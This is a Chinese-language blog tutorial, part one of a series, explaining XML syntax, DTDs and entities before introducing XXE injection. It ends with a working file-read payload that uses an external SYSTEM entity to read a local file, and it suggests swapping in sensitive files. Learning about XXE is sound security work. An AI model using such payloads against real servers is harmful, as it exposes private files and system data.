XXE漏洞(上)

最新推荐文章于 2024-06-14 15:02:13 发布
最新推荐文章于 2024-06-14 15:02:13 发布
阅读量705 收藏 10
点赞数 7
文章标签: java 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52333044/article/details/138098961
版权
本文详细介绍了XML的自定义标签、DTD的使用、文档结构规则以及XML外部实体注入(XXE)漏洞。通过实例展示了如何利用XML进行数据传输和潜在的安全风险,包括文件读取攻击。
摘要由CSDN通过智能技术生成

xml

特点:标签可以自定义
XML(可扩展标记语言)是一种用于表示和传输数据的标记语言。它设计用于具有自定义结构的文档和数据的描述,具有跨平台和跨语言的特性。
XML声明: 
<?xml version="1.0" encoding"utf-8">
xml文档有元素构成,每一个元素包括开始标签,结束标签,元素内容。
对xml标签区分大小写:
语法规则:
  • XML 文档必须有一个根元素
  • XML元素都必须有一个关闭标签
  • XML 标签对大小写敏感
  • XML 元素必须被正确的嵌套
  • XML 属性值必须加引号
DTD
文档类型定义,可被成行地声明与XML文档,也可以外部引用
<!ELEMENT 元素名 类型> 定义标签
例如: 
<!ELEMENT 班级 (学生+)> 
DTD文档
引入外部的DTD文档分为俩种:
当引用的DTD文件是本地文件的时候,用 SYSTEM标记,并写上"DTD的文件路径",如下: 
<!DOCTYPE 根元素 SYSTEM "DTD的文件路径">
引用的DTD文件是公共文件,PUBLIC 是跟远程路径 
<!DOCTYPE 根元素 PUBLIC "DTD名称" "DTD文件的url">

带有 DTD 的 XML 文档实例

<?xml version="1.0"?>
<!DOCTYPE note [  //其中定义了此文档的note 类型的文档
<!ELEMENT note (to,from,heading,body)>  //note 元素定义了四个元素:to,from ,heading,body
<!ELEMENT to (#PCDATA)>  //to元素 伪#pcdata类型
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>

外部文档声明

xml内容
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">  //引用本地文件,note.dtd 其中根元素名称为 note
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

DTD的"note.dtd文件"
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

DTD基本语法:

<!ELEMENT NAME CONTENT>
ELEMENT---关键字,不能修改
NAME——元素名称
CONTENT——元素类型,必须大写,内容的三种写法:
EMPTY ——元素不能包含子元素和文本,但可以有属性
ANY——元素可以包含任何在该DTD定于内容
#PCDATA——可以包含容易字符数据,但不能其他的包含任何子元素
其中

DTD声明实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
  • 实体引用是对实体的引用。
  • 实体可在内部或外部进行声明。

内部实体声明代码

<!ENTITY writer "Donald Duck."> //定义了writer 实体,这个实体的内容就是Donald Duck.
<!ENTITY copyright "Copyright runoob.com"> //定义了copyright实体,这个实体的内容就是Copyright runoob.com,这个实体充当变量使用
XML
<author>&writer;&copyright;</author> //引用使用&,这样输出的就是这个变量的内容

XXE漏洞

xxe漏洞全称xml Ecternal Entity lijection 即xml外部实体注入漏洞,xxe漏洞发生在应用程序解析xml 输入时,没有静止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命命执行,内网端口扫描,攻击内网网站,发起dos攻击等
特征:在http的request出现请求报文中,表明使用xml来传数据传输,来测试xxs漏洞
实例:
抓包
我们可以发现: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

其中可以使用xml进行数据传送的

写一个简单的payload 
<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "你好xxe">
]>
<note>&hacker;</note>
可以看到我们的字符串被运行了的,然后写文件读取
文件读取: 
<?xml version="1.0"?>  
<!DOCTYPE foo [    
 <!ENTITY xxe SYSTEM "file:///D:/a.txt" > 
]> 
 <foo>&xxe;</foo>
查看D盘下的文件
可以替换成各种敏感信息文件,这就是简单的文件读取,太晚了,后续的再补。。。
殇ベ言清欢
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
XXE漏洞利用
weixin_45253622的博客
05-20 2084
XXE(XML外部实体注入) 漏洞介绍 漏洞复现 漏洞防御 漏洞介绍 XXE(XMLExternal Entity Injection)也就是XML外部实体注入,XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml库,而libxml2.9以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持file://和ftp://等协议,导致可加载恶意外部文件和代码,造成
XXE漏洞笔记
qq_32812063的博客
11-26 581
XXE
XXE 漏洞及案例实战
来日可期的博客
09-24 2234
XXE漏洞全称XML External Entity Injection,即XML外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
java xxe漏洞利用_JAVAXXE漏洞
weixin_30445963的博客
03-09 1992
1. XXE简介XXE(XML外部实体注入,XML External Entity) ,漏洞在对不安全的外部实体数据进行处理时,可能存在恶意行为导致读取任意文件、探测内网端口、攻击内网网站、发起DoS拒绝服务攻击、执行系统命令等问题。简单来说,如果系统能够接收并解析用户的XML,但未禁用DTD和Entity时,可能出现XXE漏洞,常见场景如pdf在线解析、word在线解析、定制协议或者其他可以解析...
java xxe漏洞利用_XXE漏洞攻防原理
weixin_42503415的博客
03-09 900
方便永远是安全的敌人你的知识面,决定你的攻击面1简述XXE(XML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。而如今越来越多的WEB程序被发现和报告...
XXE漏洞
qq_44768719的博客
11-04 302
** XXE漏洞 ** 这里是引用 一、XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 ...
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3546
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
xxe漏洞详解
good good study
03-03 5589
目录 一. XML 1. xml文档 2. XML元素 3. DTD 二. 漏洞描述 三. pikachu靶场之xxe 1. 任意文件读取 2. 命令执行 3. 源码分析 四. bwapp靶场之xxe 1. 利用DNSlog测试命令执行 2. 读取本地文件 ​ 这几天又开始漏洞复现了,抽空整理一下漏洞原理,正所谓温故而知新,学习这个漏洞之前我们得了解什么是XML、DTD 一. XML 1. xml文档 XML 指可扩展标记语言,相对于HTML被用来显示数据,XML被设计用来
XXE漏洞复现
m0_57485346的博客
03-15 619
XXE漏洞复现
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE漏洞利用 - 任意文件读取 XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件...
【仿真建模-anylogic】FlowchartPort原理解析
zhaoyaxuan001的博客
06-14 302
FlowchartPort是流图组件端口的基类,一般不会直接使用;如果需要自行封装组件库时会用到;FlowchartPort继承Port类,并定义了一系列抽象函数;用于输入端口判定此刻是否不能接收Agent。用于输出端口判定是否有Agent准备离开。判定端口是否发生错误。
盲盒App开发时有哪些技术框架可以借鉴
最新发布
bytekj的博客
06-14 519
在开发盲盒App时,可以根据项目需求和团队技术栈选择合适的技术框架。前端可以选择微信小程序框架、React Native或Vue.js等;后端可以选择Node.js或Spring Boot等;数据库可以选择MySQL或MongoDB等。同时,还需要考虑缓存、消息队列、支付和物流接口等其他技术来完善应用的功能和性能。
Java02】Java中数组的定义与初始化
饮冰室
06-10 593
推荐第一种方式。这种方式容易让人理解,数据类型是type[],对象名称是arrayName。第二种方式有些老旧了。由于数组是一种引用变量(也就是一个指针),所以定义的时候还没有指向任何有效的内存空间,因此在定义数组的时候不能指定数组的长度,也不能直接使用。必须进行初始化。可以使用var让系统自动推断变量类型,既可以用于静态初始化,也可以用于动态初始化。
【2024最新华为OD-C/D卷试题汇总】[支持在线评测] CPU算力分配(100分) - 三语言AC题解(Python/Java/Cpp)
清隆学长的博客
06-11 393
### 问题描述 K小姐是某公司运营部门的主管,最近她需要对公司的两组服务器进行算力分配。每组服务器有多个算力不同的 $CPU$,其中 $A$ 组第 $i$ 个 $CPU$ 的运算能力为 $A[i]$,而 $B$ 组第 $i$ 个 $CPU$ 的运算能力为 $B[i]$。一组服务器的总算力是各 $CPU$ 的算力之和。 为了让两组服务器的算力相等,K小姐允许从每组各选出一个 $CPU$ 进行一次交换。她希望从 $A$ 组服务器中选出算力尽可能小的 $CPU$ 来交换,你能帮她计算出应该选择哪两个 $CP
geoserver xxe漏洞
09-02
XXE漏洞是一种安全漏洞,攻击者可以利用该漏洞来读取本地或远程服务器上的文件。这种漏洞通常是由于应用程序在处理XML输入时,对外部实体的处理不当而引起的。 具体到Geoserver的XXE漏洞,它可能会受到XML实体注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值